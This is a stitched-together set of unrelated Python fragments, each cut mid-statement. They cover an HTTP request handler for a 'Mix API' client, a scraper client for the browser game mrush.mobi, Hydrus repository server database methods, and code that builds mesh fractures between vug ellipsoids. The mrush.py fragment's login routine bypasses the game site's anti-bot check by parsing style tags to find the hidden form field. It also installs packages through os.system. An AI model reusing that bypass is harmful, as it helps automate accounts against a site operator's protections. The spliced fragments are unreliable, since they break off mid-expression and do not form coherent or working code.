return headers_copy
@abstractmethod
def request(self, url: str, method: Optional[str] = None, headers: Optional[Dict] = None,
data: Optional[Union[str, Dict]] = None, default_headers: bool = False, data_as_str: bool = True,
url_fq: bool = False, no_output: bool = False, stream: bool = False, out_file: Optional[str] = None,
json_resp: bool = False, validate_json: bool = True, check_error: bool = True,
need_status: bool = False, byte_resp: bool = False,
**kwargs) -> Optional[Union[RequestResult, Tuple[RequestResult, int]]]:
"""
Send request
:param need_status: Also need status code
:param validate_json: When expecting JSON response, validate the JSON
:param byte_resp: Function should return bytestring as response
:param out_file: Response payload should be directed to an output file
:param stream: Response payload is expected to be returned progressively and should be retrieved as stream.
:param url: Target API endpoint or URL
:param method: HTTP method to use for sending the request
:param headers: HTTP headers used in request
:param data: Payload data used in request
:param default_headers: If should use default HTTP headers for Mix API requests
:param data_as_str: Data should be treated as string
:param url_fq: If function parameter "url" is a fully-qualified URL
:param no_output: Do not expect any output in response
:param json_resp: The response payload is expected to be a valid Json object, array, or value.
:param check_error: If function should perform error-checking on response payload.
:param kwargs:
:return:
"""
...
@abstractmethod
def is_http_method_supported(self, method: str) -> bool:
"""
Check if a HTTP method is supported
:param method: Name of HTTP method
:return: True if this HTTP method is supported
"""
...
@property
@abstractmethod
def host(self):
...
@property
@abstractmethod
def endpoint_prefix(self):
...
class PyRequestsRunner(HTTPRequestHandler):
"""
Implementation class to query HTTP/HTTPS APIs with "requests" package
"""
def __init__(self, auth_handler: MixApiAuthHandler,
host: Optional[str], log_level: Optional[Union[str, int]] = None,
no_token_log: Optional[bool] = True):
"""
Constructor
:param auth_handler: The MixApiAuthHandler instance used to generate auth token info for request headers
:param host: Host name to send HTTP/HTTPS requests
:param log_level: Log level used in this instance
:param no_token_log: Suppress the auth token in logging messages.
"""
HTTPRequestHandler.__init__(self, auth_handler, self.name, log_level=log_level, no_token_log=no_token_log)
if host:
self._host = host
else:
self._host = DEFAULT_API_HOST
# hostname must not end with '/'
if self._host.endswith(URL_PATH_SEP):
self._host = self._host[:-1]
# endpoint path prefix should start with '/'
self._endpt_prefix = DEFAULT_API_PATH_PREFIX
if not self._endpt_prefix.startswith(URL_PATH_SEP):
self._endpt_prefix = URL_PATH_SEP + self._endpt_prefix
@property
def name(self) -> str:
return 'PyReqRunner'
@classmethod
def requests_method(cls, method: str) -> str:
return method
@property
def host(self) -> str:
return self._host
@property
def endpoint_prefix(self) -> str:
return self._endpt_prefix
def endpoint_url(self, endpoint: str, need_prefix: bool = True) -> str:
if not endpoint.startswith(URL_PATH_SEP):
endpoint = URL_PATH_SEP + endpoint
prefix = self.host
if need_prefix:
prefix += self.endpoint_prefix
return prefix + endpoint
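# For example, with the defaults above endpoint_url('bots/project') yields
# 'https://mix.nuance.com/v3/bots/project', and endpoint_url('bots/project', need_prefix=False)
# yields 'https://mix.nuance.com/bots/project' ('bots/project' is a hypothetical endpoint path).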
def request(self, url: str, method: Optional[str] = None, headers: Optional[Dict] = None,
data: Optional[Union[str, Dict]] = None, default_headers: bool = False, data_as_str: bool = True,
url_fq: bool = False, stream=False, outfile=None, no_output: bool = False,
json_resp: bool = False, validate_json: bool = True, check_error: bool = True,
byte_resp: bool = False, need_status: bool = False,
**kwargs) -> Optional[Union[RequestResult, Tuple[RequestResult, int]]]:
if json_resp and byte_resp:
raise RuntimeError('Argument json_resp and byte_resp can NOT be both True')
if byte_resp:
stream = True
if not method:
req_method = GET_METHOD
else:
if not self.is_http_method_supported(method):
raise ValueError(f'Given requests HTTP method not supported: {method}')
req_method = self.requests_method(method)
url = url
if not url_fq:
url = self.endpoint_url(url)
if not headers:
if default_headers:
headers = self.get_default_headers()
if data:
if isinstance(data, str):
try:
self.debug(f'data being string: {truncate_long_str(data)}')
if not data_as_str:
data = json.loads(data)
except Exception as ex:
raise ValueError(f'"data" sent to RequestRunner.request is not a valid Json') from ex
else:
data_str = json.dumps(data)
self.debug(f'data being json: {data_str}')
if data_as_str:
data = data_str
self.debug('data will be sent as string in request')
try:
headers_repr = proc_headers_token_for_log(headers, self.no_token_log)
self.debug(f'Running requests with method {req_method}')
# File: mrush.py
#Thanks and greetings to https://github.com/Wilidon, without him I would not have figured out how to bypass the anti-bot system
#Contact me: @a352642 (telegram)
import os
import time
try:
import requests
from bs4 import BeautifulSoup as BS
except:
print("Installing module 'requests'")
os.system("pip3 install requests -q")
print("Installing module 'beautifulsoup4'")
os.system("pip3 install beautifulsoup4 -q")
class Client:
def __init__(self, name: str, password: str):
self.session = requests.Session()
self.url = "https://mrush.mobi/" #URL нашей игры
self.name = name #Ваше имя в игре
self.password = password #Ваш пароль в игре
self.headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
}
self.login()
def login(self): #Log into the account
response = self.session.get(self.url+"welcome", headers=self.headers) #Send a GET request to the server
html = response.text #Get the HTML code of the page
if "я не робот" in html: #If there is an anti-bot check
soup = BS(html, "html.parser")
elems = soup.findAll("style") #Get all the elements of the protection system
for elem in elems:
if "margin-left:" not in str(elem) and "display: none;" not in str(elem) and "overflow: hidden" not in str(elem): #If this element is not hidden, it is the one we need
correct_elem = str(elem).split(".")[1].split("{")[0] #Extract its class name from the code
correct_elem = soup.find("div", class_=correct_elem).find("input")["name"] #Use it to find the other element we need
request = self.session.post(self.url+"login", headers=self.headers, data={ #Send a POST request
"name": self.name,
"password": self.password,
correct_elem: "" #The element we found
})
if "Неправильное Имя или Пароль" in request.text: #Check that the credentials are valid
return "Incorrect name or password at 'login'"
if "заблокирован" in request.text: #Check for a ban
return "You have been banned"
return "Succesfull"
elif "Вы кликаете слишком быстро" in html:
time.sleep(2)
self.login()
else: #If there is no anti-bot check
request = self.session.post(self.url+"login", headers=self.headers, data={ #Send a POST request
"name": self.name,
"password": self.password
})
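# Usage sketch (hypothetical credentials; purely illustrative, not part of the original script):
# client = Client("MyName", "MyPassword")
# my_info = client.profile() # your own profile
# other_info = client.profile("12345") # profile of the player with this ID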
#=================================================================
#=======================GET REQUESTS=============================
#=================================================================
def profile(self, id: str = None): #Information from your own or someone else's profile
if id == None: #If no ID is given, get the information from your own profile
response = self.session.get(self.url+"profile", headers=self.headers) #Send a GET request
else: #If an ID is given, get the information of the player with that ID
response = self.session.get(self.url+"view_profile?player_id="+id, headers=self.headers) #Send a GET request
html = response.text #Get the HTML code of the page
if "Вы кликаете слишком быстро" in html:
time.sleep(2)
self.profile(id)
soup = BS(html, "html.parser")
elems = soup.findAll("span") #Получаем данные
data = {} #Сюда будут сохранятся обработанные данные
for elem in elems:
if "visibility: hidden" not in str(elem): #Если элемент показан
elem = elem.text.replace("\t", "").replace("\n", "") #Убираем все лишнее
if "уровень" in elem: #Узнаем уровень и имя
data["name"] = elem.split(",")[0].strip()
data["level"] = elem.split(",")[1].split("уровень")[0].replace(" ", "")
if "Статус" in elem: #Узнаем статус
data["status"] = " ".join(elem.split(":")[1:])
if "Опыт" in elem: #Узнаем текущий опыт и опыт необходимый для перехода на следующий уровень
data["exp"] = elem.split(":")[1].split("/")[0].replace(" ", "")
data["exp_max"] = elem.split(":")[1].split("/")[1].replace(" ", "")
if "Доблесть" in elem: #Узнаем текущий уровень доблести
data["valor_level"] = elem.split(":")[1].split("у")[0].replace(" ", "")
if "Сила" in elem: #Узнаем текущую силу
data["strength"] = elem.split(":")[1].replace(" ", "")
if "Здоровье" in elem: #Узнаем текущее здоровье
data["health"] = elem.split(":")[1].replace(" ", "")
if "Броня" in elem: #Узнаем текущую броню
data["defense"] = elem.split(":")[1].replace(" ", "")
if "Золото" in elem: #Узнаем текущее кол-во золота
data["gold"] = elem.split(":")[1].replace(" ", "")
if "Серебро" in elem: #Узнаем текущее кол-во серебра
data["silver"] = elem.split(":")[1].replace(" ", "")
if "valor_level" not in data: #Если не удалось узнать доблесть
if id == None: #В своем профиле
response = self.session.get(self.url+"valor_info", headers=self.headers) #Посылаем GET запрос
html = response.text
soup = BS(html, "html.parser")
elems = soup.findAll("div", class_="mlr10")
for elem in elems:
if "уровень" in str(elem):
data["valor_level"] = elem.text.split(":")[1].split("Ваши")[0].replace(" ", "").replace("\n", "")
else: #In someone else's profile
response = self.session.get(self.url+"valor_info?player_id="+id, headers=self.headers) #Send a GET request
html = response.text
soup = BS(html, "html.parser")
elems = soup.findAll("div", class_="mt10")
for elem in elems:
elem = elem.text.replace("\n", "").replace("\t", "")
if "За" in elem:
data["valor_level"] = elem.split("й")[1].split("у")[0].replace(" ", "")
links = soup.findAll("a")
for link in links:
if "player_id" in link["href"]:
data["player_id"] = link["href"].split("=")[1].split("&")[0]
return data
def best(self, pages: int = 1, category: int = 1): #List of the best players
if pages > 500: pages = 500 #Cap at the maximum number of pages
data = {} #Dictionary to return
for i in range(1, pages+1):
player_list = {} #Helper container
a = [] #Helper container x2
i = str(i)
urls = ["?pvp=0&page="+i, "/clans&page="+i, "?pvp=1&page="+i, "?pvp=2&page="+i, "/fightValor?page="+i, "/invasionValor?page="+i, "/tourneyValor?page="+i, "/towerValor?page="+i, "/throneValor?page="+i, "/clanTourneyValor?page="+i, "/armyValor?page="+i, "/clanSurvivalValor?page="+i]
response = self.session.get(self.url+"best"+urls[category-1], headers=self.headers) #Посылаем GET запрос
html = response.text #Получаем HTML код страницы
if "Вы кликаете слишком быстро" in html:
time.sleep(2)
self.best(pages, category)
if "Рейтинг лучших" or "Боевая доблесть" in html: #Проверяем, нужную ли страницу нашли
soup = BS(html, "html.parser")
rating_ = soup.find("table", class_="wa").findAll("td", class_="yell") #Find the players' positions and ratings
names = soup.find("table", class_="wa").findAll("a") #Find the players' names
position = [] #Helper container x3
rating = [] #Helper container x4
for j in range(0, len(rating_)):
if j % 2 == 0: #If the element index is even, it is a player's position
position.append(rating_[j].text)
else: #Otherwise it is their rating
rating.append(rating_[j].text)
for j in range(0, 16 if category != 2 else 15):
if position[j] != "10000": #Условие чтобы ваш профиль не отображался
player_list["position"] = position[j]
player_list["name"] = names[j].text
player_list["rating"] = rating[j]
a.append(player_list)
player_list = {}
data[i] = a
return data
def train(self): #Get our training levels
data = { #Template for the output
"strength": {},
"health": {},
"defense": {}
}
response = self.session.get(self.url+"train", headers=self.headers) #Посылаем GET запрос
html = response.text #Получаем HTML код страницы
if "Вы кликаете слишком быстро" in html:
time.sleep(2)
self.train()
soup = BS(html, "html.parser")
elems = soup.findAll("span", class_="darkgreen_link font_15") #Находим прибавки к аттрибутам
data["strength"]["bonus"] = elems[0].text
data["health"]["bonus"] = elems[1].text
data["defense"]["bonus"] = elems[2].text
elems = soup.findAll("div", class_="ml68") #Находим уровни тренировок
levels = []
for elem in elems:
levels.append(elem.text.split(":")[1].split("из")[0].replace(" ", "")) #Process them
data["strength"]["level"] = levels[0]
data["health"]["level"] = levels[1]
data["defense"]["level"] = levels[2]
elems = soup.findAll("span", class_="ur") #Находим цену и валюту следующего улучшения
cost = []
currency = []
for elem in elems: #Process them
cost.append(elem.text.split("за ")[1])
currency_ = elem.find_next("img")["src"].split("/")[-1]
if currency_ == "gold.png":
currency.append("gold")
else:
currency.append("silver")
data["strength"]["cost"] = cost[0]
data["health"]["cost"] = cost[1]
data["defense"]["cost"] = cost[2]
data["strength"]["currency"] = currency[0]
data["health"]["currency"] = currency[1]
data["defense"]["currency"] = currency[2]
return data
def task(self, category: int = 1): #Get the story/daily tasks
data = {} #Template for the output
task = {} #Helper container
categories = ["task", "task/daily"]
response = self.session.get(self.url+categories[category-1], headers=self.headers) #Send a GET request
html = response.text #Get the HTML code of the page
if "Вы кликаете слишком быстро" in html:
time.sleep(2)
self.task(category)
soup = BS(html, "html.parser")
elems = soup.findAll("div", class_="wr8") #Находим нужные элементы
result = [] #Будем сохранять необработанные данные сюда
task_ = [] #Список для текстов заданий
level = [] #Текущий прогресс на задании
level_required = [] #Нужный уровень для выполнения
for elem in elems:
result.append(elem.text.replace("\n", "").replace("\t", "")) #Обрабатываем каждый элемент и сохраняем его
result = result[1:] #Обрезаем заголовок
for i in result: #Обрабатываем каждый пункт и сохраняем их
task_.append(i.split(":")[0].split("Прогресс")[0].strip())
level.append(i.split(":")[1].split("из")[0].replace(" ", ""))
level_required.append(i.split("из ")[1].replace(" ", ""))
for i in range(0, len(task_)): #Write them into the data dictionary
task["task"] = task_[i]
task["level"] = level[i]
task["level_required"] = level_required[i]
data[str(i)] = task
task = {}
return data
def clan(self, id: str): #Get clan information (IMPORTANT! May work incorrectly with some clans. Their HTML code differs; this issue may be fixed in the future)
data = {} #Template for the output
response = self.session.get(self.url+"clan?id="+str(id), headers=self.headers) #Send a GET request
html = response.text #Get the HTML code of the page
if "Вы кликаете слишком быстро" in html: #Check that we got the right page
time.sleep(2)
self.clan(id)
if "Хочу в клан!" in html: #Проверка что данный клан существует
return "Incorect clan id at 'clan'"
if "О клане" in html: #Проверка на нужную страницу x2
soup = BS(html, "html.parser")
try:
data["name"] = soup.find("div", class_="rr").text.replace("\n", "").replace("\t", "")
except AttributeError:
data["name"] = soup.find("div", class_="bold").text.replace("\n", "").replace("\t", "") #Получаем название клана
data["description"] = soup.find("span", class_="green_dark").text.replace("\n", "").replace("\t", "")[2:]
elems = soup.find("div", class_="mlr10").text.split("\n")
for elem in elems: #Get the clan information
if elem != "":
if "О клане" not in elem:
if "Основан" in elem:
data["founded"] = elem.split(":")[1].strip()
elif "Уровень" in elem:
data["level"] = elem.split(":")[1].strip()
elif "Опыт" in elem:
data["exp"] = elem.split(":")[1].split("из")[0].replace(" ", "")
try:
data["exp_required"] = elem.split(":")[1].split("из")[1].replace(" ", "")
except:
pass
elem = soup.findAll("a", class_="mb2")[2]
data["buildings_percent"] = elem.text.split("(")[1].split(")")[0]
time.sleep(0.5)
response = self.session.get(self.url+"builds?id="+str(id), headers=self.headers) #Посылаем GET запрос
html = response.text #Get the HTML code of the page
'sibling_timestamp' ] )
self._Execute( 'CREATE TABLE ' + pending_tag_siblings_table_name + ' ( bad_master_tag_id INTEGER, good_master_tag_id INTEGER, account_id INTEGER, reason_id INTEGER, PRIMARY KEY ( bad_master_tag_id, account_id ) ) WITHOUT ROWID;' )
self._CreateIndex( pending_tag_siblings_table_name, [ 'account_id', 'reason_id' ] )
self._Execute( 'CREATE TABLE ' + petitioned_tag_siblings_table_name + ' ( bad_service_tag_id INTEGER, good_service_tag_id INTEGER, account_id INTEGER, reason_id INTEGER, PRIMARY KEY ( bad_service_tag_id, account_id ) ) WITHOUT ROWID;' )
self._CreateIndex( petitioned_tag_siblings_table_name, [ 'account_id', 'reason_id' ] )
#
( update_table_name ) = GenerateRepositoryUpdateTableName( service_id )
self._Execute( 'CREATE TABLE ' + update_table_name + ' ( master_hash_id INTEGER PRIMARY KEY );' )
def _RepositoryCreateUpdate( self, service_key, begin, end ):
service_id = self._GetServiceId( service_key )
( name, ) = self._Execute( 'SELECT name FROM services WHERE service_id = ?;', ( service_id, ) ).fetchone()
HydrusData.Print( 'Creating update for ' + repr( name ) + ' from ' + HydrusData.ConvertTimestampToPrettyTime( begin, in_utc = True ) + ' to ' + HydrusData.ConvertTimestampToPrettyTime( end, in_utc = True ) )
updates = self._RepositoryGenerateUpdates( service_id, begin, end )
update_hashes = []
total_definition_rows = 0
total_content_rows = 0
if len( updates ) > 0:
for update in updates:
num_rows = update.GetNumRows()
if isinstance( update, HydrusNetwork.DefinitionsUpdate ):
total_definition_rows += num_rows
elif isinstance( update, HydrusNetwork.ContentUpdate ):
total_content_rows += num_rows
update_bytes = update.DumpToNetworkBytes()
update_hash = hashlib.sha256( update_bytes ).digest()
dest_path = ServerFiles.GetExpectedFilePath( update_hash )
with open( dest_path, 'wb' ) as f:
f.write( update_bytes )
update_hashes.append( update_hash )
( update_table_name ) = GenerateRepositoryUpdateTableName( service_id )
master_hash_ids = self._GetMasterHashIds( update_hashes )
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + update_table_name + ' ( master_hash_id ) VALUES ( ? );', ( ( master_hash_id, ) for master_hash_id in master_hash_ids ) )
HydrusData.Print( 'Update OK. ' + HydrusData.ToHumanInt( total_definition_rows ) + ' definition rows and ' + HydrusData.ToHumanInt( total_content_rows ) + ' content rows in ' + HydrusData.ToHumanInt( len( updates ) ) + ' update files.' )
return update_hashes
def _RepositoryDeleteFiles( self, service_id, account_id, service_hash_ids, timestamp ):
( current_files_table_name, deleted_files_table_name, pending_files_table_name, petitioned_files_table_name, ip_addresses_table_name ) = GenerateRepositoryFilesTableNames( service_id )
select_statement = 'SELECT service_hash_id FROM ' + current_files_table_name + ' WHERE service_hash_id = ?;'
valid_service_hash_ids = self._STL( self._ExecuteManySelectSingleParam( select_statement, service_hash_ids ) )
self._RepositoryRewardFilePetitioners( service_id, valid_service_hash_ids, 1 )
self._ExecuteMany( 'DELETE FROM ' + current_files_table_name + ' WHERE service_hash_id = ?', ( ( service_hash_id, ) for service_hash_id in valid_service_hash_ids ) )
self._ExecuteMany( 'DELETE FROM ' + petitioned_files_table_name + ' WHERE service_hash_id = ?', ( ( service_hash_id, ) for service_hash_id in valid_service_hash_ids ) )
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + deleted_files_table_name + ' ( service_hash_id, account_id, file_timestamp ) VALUES ( ?, ?, ? );', ( ( service_hash_id, account_id, timestamp ) for service_hash_id in valid_service_hash_ids ) )
def _RepositoryDeleteMappings( self, service_id, account_id, service_tag_id, service_hash_ids, timestamp ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateRepositoryMappingsTableNames( service_id )
select_statement = 'SELECT service_hash_id FROM ' + current_mappings_table_name + ' WHERE service_tag_id = ' + str( service_tag_id ) + ' AND service_hash_id = ?;'
valid_service_hash_ids = self._STL( self._ExecuteManySelectSingleParam( select_statement, service_hash_ids ) )
self._RepositoryRewardMappingPetitioners( service_id, service_tag_id, valid_service_hash_ids, 1 )
self._ExecuteMany( 'DELETE FROM ' + current_mappings_table_name + ' WHERE service_tag_id = ? AND service_hash_id = ?;', ( ( service_tag_id, service_hash_id ) for service_hash_id in valid_service_hash_ids ) )
self._ExecuteMany( 'DELETE FROM ' + petitioned_mappings_table_name + ' WHERE service_tag_id = ? AND service_hash_id = ?;', ( ( service_tag_id, service_hash_id ) for service_hash_id in valid_service_hash_ids ) )
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + deleted_mappings_table_name + ' ( service_tag_id, service_hash_id, account_id, mapping_timestamp ) VALUES ( ?, ?, ?, ? );', ( ( service_tag_id, service_hash_id, account_id, timestamp ) for service_hash_id in valid_service_hash_ids ) )
def _RepositoryDeleteTagParent( self, service_id, account_id, child_service_tag_id, parent_service_tag_id, timestamp ):
( current_tag_parents_table_name, deleted_tag_parents_table_name, pending_tag_parents_table_name, petitioned_tag_parents_table_name ) = GenerateRepositoryTagParentsTableNames( service_id )
self._RepositoryRewardTagParentPetitioners( service_id, child_service_tag_id, parent_service_tag_id, 1 )
self._Execute( 'DELETE FROM ' + current_tag_parents_table_name + ' WHERE child_service_tag_id = ? AND parent_service_tag_id = ?;', ( child_service_tag_id, parent_service_tag_id ) )
self._Execute( 'DELETE FROM ' + petitioned_tag_parents_table_name + ' WHERE child_service_tag_id = ? AND parent_service_tag_id = ?;', ( child_service_tag_id, parent_service_tag_id ) )
self._Execute( 'INSERT OR IGNORE INTO ' + deleted_tag_parents_table_name + ' ( child_service_tag_id, parent_service_tag_id, account_id, parent_timestamp ) VALUES ( ?, ?, ?, ? );', ( child_service_tag_id, parent_service_tag_id, account_id, timestamp ) )
def _RepositoryDeleteTagSibling( self, service_id, account_id, bad_service_tag_id, good_service_tag_id, timestamp ):
( current_tag_siblings_table_name, deleted_tag_siblings_table_name, pending_tag_siblings_table_name, petitioned_tag_siblings_table_name ) = GenerateRepositoryTagSiblingsTableNames( service_id )
self._RepositoryRewardTagSiblingPetitioners( service_id, bad_service_tag_id, good_service_tag_id, 1 )
self._Execute( 'DELETE FROM ' + current_tag_siblings_table_name + ' WHERE bad_service_tag_id = ? AND good_service_tag_id = ?;', ( bad_service_tag_id, good_service_tag_id ) )
self._Execute( 'DELETE FROM ' + petitioned_tag_siblings_table_name + ' WHERE bad_service_tag_id = ? AND good_service_tag_id = ?;', ( bad_service_tag_id, good_service_tag_id ) )
self._Execute( 'INSERT OR IGNORE INTO ' + deleted_tag_siblings_table_name + ' ( bad_service_tag_id, good_service_tag_id, account_id, sibling_timestamp ) VALUES ( ?, ?, ?, ? );', ( bad_service_tag_id, good_service_tag_id, account_id, timestamp ) )
def _RepositoryDenyFilePetition( self, service_id, service_hash_ids ):
self._RepositoryRewardFilePetitioners( service_id, service_hash_ids, -1 )
( current_files_table_name, deleted_files_table_name, pending_files_table_name, petitioned_files_table_name, ip_addresses_table_name ) = GenerateRepositoryFilesTableNames( service_id )
self._ExecuteMany( 'DELETE FROM ' + petitioned_files_table_name + ' WHERE service_hash_id = ?;', ( ( service_hash_id, ) for service_hash_id in service_hash_ids ) )
def _RepositoryDenyMappingPetition( self, service_id, service_tag_id, service_hash_ids ):
self._RepositoryRewardMappingPetitioners( service_id, service_tag_id, service_hash_ids, -1 )
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateRepositoryMappingsTableNames( service_id )
self._ExecuteMany( 'DELETE FROM ' + petitioned_mappings_table_name + ' WHERE service_tag_id = ? AND service_hash_id = ?;', ( ( service_tag_id, service_hash_id ) for service_hash_id in service_hash_ids ) )
def _RepositoryDenyTagParentPend( self, service_id, child_master_tag_id, parent_master_tag_id ):
self._RepositoryRewardTagParentPenders( service_id, child_master_tag_id, parent_master_tag_id, -1 )
( current_tag_parents_table_name, deleted_tag_parents_table_name, pending_tag_parents_table_name, petitioned_tag_parents_table_name ) = GenerateRepositoryTagParentsTableNames( service_id )
self._Execute( 'DELETE FROM ' + pending_tag_parents_table_name + ' WHERE child_master_tag_id = ? AND parent_master_tag_id = ?;', ( child_master_tag_id, parent_master_tag_id ) )
def _RepositoryDenyTagParentPetition( self, service_id, child_service_tag_id, parent_service_tag_id ):
self._RepositoryRewardTagParentPetitioners( service_id, child_service_tag_id, parent_service_tag_id, -1 )
( current_tag_parents_table_name, deleted_tag_parents_table_name, pending_tag_parents_table_name, petitioned_tag_parents_table_name ) = GenerateRepositoryTagParentsTableNames( service_id )
self._Execute( 'DELETE FROM ' + petitioned_tag_parents_table_name + ' WHERE child_service_tag_id = ? AND parent_service_tag_id = ?;', ( child_service_tag_id, parent_service_tag_id ) )
def _RepositoryDenyTagSiblingPend( self, service_id, bad_master_tag_id, good_master_tag_id ):
self._RepositoryRewardTagSiblingPenders( service_id, bad_master_tag_id, good_master_tag_id, -1 )
( current_tag_siblings_table_name, deleted_tag_siblings_table_name, pending_tag_siblings_table_name, petitioned_tag_siblings_table_name ) = GenerateRepositoryTagSiblingsTableNames( service_id )
self._Execute( 'DELETE FROM ' + pending_tag_siblings_table_name + ' WHERE bad_master_tag_id = ? AND good_master_tag_id = ?;', ( bad_master_tag_id, good_master_tag_id ) )
def _RepositoryDenyTagSiblingPetition( self, service_id, bad_service_tag_id, good_service_tag_id ):
self._RepositoryRewardTagSiblingPetitioners( service_id, bad_service_tag_id, good_service_tag_id, -1 )
( current_tag_siblings_table_name, deleted_tag_siblings_table_name, pending_tag_siblings_table_name, petitioned_tag_siblings_table_name ) = GenerateRepositoryTagSiblingsTableNames( service_id )
self._Execute( 'DELETE FROM ' + petitioned_tag_siblings_table_name + ' WHERE bad_service_tag_id = ? AND good_service_tag_id = ?;', ( bad_service_tag_id, good_service_tag_id ) )
def _RepositoryDrop( self, service_id ):
table_names = []
table_names.extend( GenerateRepositoryMasterMapTableNames( service_id ) )
table_names.extend( GenerateRepositoryFilesTableNames( service_id ) )
table_names.extend( GenerateRepositoryMappingsTableNames( service_id ) )
table_names.extend( GenerateRepositoryTagParentsTableNames( service_id ) )
table_names.extend( GenerateRepositoryTagSiblingsTableNames( service_id ) )
table_names.append( GenerateRepositoryUpdateTableName( service_id ) )
for table_name in table_names:
self._Execute( 'DROP TABLE ' + table_name + ';' )
def _RepositoryGenerateImmediateUpdate( self, service_key, account, begin, end ):
service_id = self._GetServiceId( service_key )
updates = self._RepositoryGenerateUpdates( service_id, begin, end )
return updates
def _RepositoryGenerateUpdates( self, service_id, begin, end ):
MAX_DEFINITIONS_ROWS = 50000
MAX_CONTENT_ROWS = 250000
MAX_CONTENT_CHUNK = 25000
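# These constants appear to cap the size of a single update file: each UpdateBuilder below is
# handed the corresponding maximum row count and is expected to start a new update once it is reached.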
updates = []
definitions_update_builder = HydrusNetwork.UpdateBuilder( HydrusNetwork.DefinitionsUpdate, MAX_DEFINITIONS_ROWS )
content_update_builder = HydrusNetwork.UpdateBuilder( HydrusNetwork.ContentUpdate, MAX_CONTENT_ROWS )
( service_hash_ids_table_name, service_tag_ids_table_name ) = GenerateRepositoryMasterMapTableNames( service_id )
for ( service_hash_id, hash ) in self._Execute( 'SELECT service_hash_id, hash FROM ' + service_hash_ids_table_name
compute_fractures(self, vols_per_ellipsoid, centers):
"""
Generate fractures according to the instance parameters
`fracture_shape` and `num_fractures`.
Parameters
----------
vols_per_ellipsoid : list
A list of Pymoab's ranges describing the volumes
inside each ellipsoid.
centers : numpy.array
Array containing the cartesian coordinates of
each vug ellipsoid center.
Returns
------
None
"""
if self.fracture_shape == "cylinder":
self.compute_fractures_as_cylinders(vols_per_ellipsoid, centers)
elif self.fracture_shape == "box":
self.compute_fractures_as_boxes(vols_per_ellipsoid, centers)
elif self.fracture_shape == "ellipsoid":
self.compute_fractures_as_ellipsoids(vols_per_ellipsoid, centers)
def compute_fractures_as_cylinders(self, vols_per_ellipsoid, centers):
"""
Generates random fractures shaped as cylinders connecting two vugs,
and computes the volumes inside them. If a volume is inside a
fracture, then the property `fracture` of the mesh data
structure is set to 1.
Parameters
----------
vols_per_ellipsoid : list
A list of Pymoab's ranges describing the volumes
inside each ellipsoid.
centers : numpy.array
Array containing the cartesian coordinates of
each vug ellipsoid center.
Returns
------
None
"""
selected_pairs = []
for i in range(self.num_fractures):
# Find a pair of ellipsoids that are not overlapped and are
# not already connected by a fracture.
while True:
e1, e2 = self.random_rng.choice(
np.arange(self.num_ellipsoids), size=2, replace=False)
if (e1, e2) not in selected_pairs and \
rng.intersect(vols_per_ellipsoid[e1], vols_per_ellipsoid[e2]).empty():
selected_pairs.extend([(e1, e2), (e2, e1)])
break
# Calculating the cylinder's parameters.
L = np.linalg.norm(centers[e1] - centers[e2]) # Length
r = 10 / L # Radius
print("Creating fracture {} of {}".format(i+1, self.num_fractures))
self.check_intersections_for_cylinders(
r, L, centers[e1], centers[e2])
def compute_fractures_as_boxes(self, vols_per_ellipsoid, centers):
"""
Generates random fractures shaped as boxes connecting two vugs,
and computes the volumes inside them. If a volume is inside a
fracture, then the property `fracture` of the mesh data
structure is set to 1.
Parameters
----------
vols_per_ellipsoid : list
A list of Pymoab's ranges describing the volumes
inside each ellipsoid.
centers : numpy.array
Array containing the cartesian coordinates of
each ellipsoid center.
Returns
------
None
"""
# Compute minimal parameter size for boxes.
all_edges_endpoints = self.mesh.edges.connectivities[:]
N = len(all_edges_endpoints)
all_edges_coords = self.mesh.nodes.coords[all_edges_endpoints.flatten()].reshape((N, 2, 3))
edges_length = np.linalg.norm(all_edges_coords[:, 0, :] - all_edges_coords[:, 1, :], axis=1)
min_height = edges_length.min()
min_length = edges_length.max()
selected_pairs = []
for i in range(self.num_fractures):
# Find a pair of ellipsoids that are not overlapped and are
# not already connected by a fracture.
while True:
e1, e2 = self.random_rng.choice(
np.arange(self.num_ellipsoids), size=2, replace=False)
if (e1, e2) not in selected_pairs and \
rng.intersect(vols_per_ellipsoid[e1], vols_per_ellipsoid[e2]).empty():
selected_pairs.extend([(e1, e2), (e2, e1)])
break
d = np.linalg.norm(centers[e1] - centers[e2])
l = min_length if min_length > d / 20 else d / 20
h = min_height
print("Creating fracture {} of {}".format(i+1, self.num_fractures))
self.check_intersections_for_boxes(
centers[e1], centers[e2], d, l, h)
def compute_fractures_as_ellipsoids(self, vols_per_ellipsoid, centers):
"""
Generates random fractures shaped as ellipsoids connecting two vugs,
and computes the volumes inside them. If a volume is inside a
fracture, then the property `fracture` of the mesh data
structure is set to 1.
Parameters
----------
vols_per_ellipsoid : list
A list of Pymoab's ranges describing the volumes
inside each ellipsoid.
centers : numpy.array
Array containing the cartesian coordinates of
each ellipsoid center.
Returns
------
None
"""
# Compute minimal parameter size for ellipsoids.
all_edges_endpoints = self.mesh.edges.connectivities[:]
N = len(all_edges_endpoints)
all_edges_coords = self.mesh.nodes.coords[all_edges_endpoints.flatten()].reshape((N, 2, 3))
edges_length = np.linalg.norm(all_edges_coords[:, 0, :] - all_edges_coords[:, 1, :], axis=1)
param_c = edges_length.min()
selected_pairs = []
for i in range(self.num_fractures):
# Find a pair of ellipsoids that are not overlapped and are
# not already connected by a fracture.
while True:
e1, e2 = self.random_rng.choice(
np.arange(self.num_ellipsoids), size=2, replace=False)
if (e1, e2) not in selected_pairs and \
rng.intersect(vols_per_ellipsoid[e1], vols_per_ellipsoid[e2]).empty():
selected_pairs.extend([(e1, e2), (e2, e1)])
break
print("Creating fracture {} of {}".format(
i + 1, self.num_fractures))
c1, c2 = centers[e1], centers[e2]
d = np.linalg.norm(c1 - c2)
params = np.array((d / 2, d / 20, param_c))
self.check_intersections_for_ellipsoids(c1, c2, params)
def check_intersections_for_cylinders(self, R, L, c1, c2):
"""
Check which volumes are inside the fracture.
Parameters
----------
R : float
Cylinder's radius
L : float
Cylinder's length
c1 : numpy.array
Left end of the cylinder's axis.
c2 : numpy.array
